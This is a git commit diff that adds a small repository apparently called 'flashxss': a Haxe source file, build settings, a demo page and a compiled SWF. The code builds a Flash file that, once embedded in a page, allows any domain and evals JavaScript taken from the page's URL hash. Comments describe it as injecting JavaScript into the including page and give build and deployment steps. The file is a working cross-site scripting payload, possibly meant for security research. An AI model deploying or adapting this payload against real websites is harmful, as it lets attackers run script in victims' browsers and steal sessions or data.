From: Jann Horn Date: Wed, 16 Apr 2014 15:44:50 +0000 (+0200) Subject: i X-Git-Url: http://git.thejh.net/?a=commitdiff_plain;h=HEAD;p=flashxss.git i --- e6646686597d58c5a95998c93baae54d72029491 diff --git a/Xss.hx b/Xss.hx new file mode 100644 index 0000000..c59933a --- /dev/null +++ b/Xss.hx @@ -0,0 +1,47 @@ +// xss.hx +// +// Purpose: +// This haxe source file builds a SWF which injects JavaScript into the including page. +// +// To build: +// 1. Acquire the latest stable version of haxe from http://haxe.org/download +// Note: To run haxe, you may also need Neko (http://nekovm.org/download) +// 2. Create a file called xss.hx with these contents. +// 3. Create a file called compile.hxml with the following content: +// -swf-version 9 +// -swf xss.swf +// -main xss +// 4. From the command line, execute: +// haxe compile.hxml +// +// To activate: +// 1. Take xss.swf generated by haxe and deploy it to your webserver. +// 2. Embed it into your HTML file with code like the following: +// +// + +import flash.external.ExternalInterface; + +class Xss { + + public static function main() { + flash.system.Security.allowDomain("*"); + ExternalInterface.call( [ "(function(){setTimeout(\"", + "eval(document.location.hash.slice(1))", + "\",0);})" ].join('') ); + } + +} diff --git a/compile.hxml b/compile.hxml new file mode 100644 index 0000000..081a044 --- /dev/null +++ b/compile.hxml @@ -0,0 +1,3 @@ +-swf-version 9 +-swf xss.swf +-main Xss diff --git a/demo.html b/demo.html new file mode 100644 index 0000000..787b23c --- /dev/null +++ b/demo.html @@ -0,0 +1,2 @@ + diff --git a/xss.swf b/xss.swf new file mode 100644 index 0000000..5564f35 Binary files /dev/null and b/xss.swf differ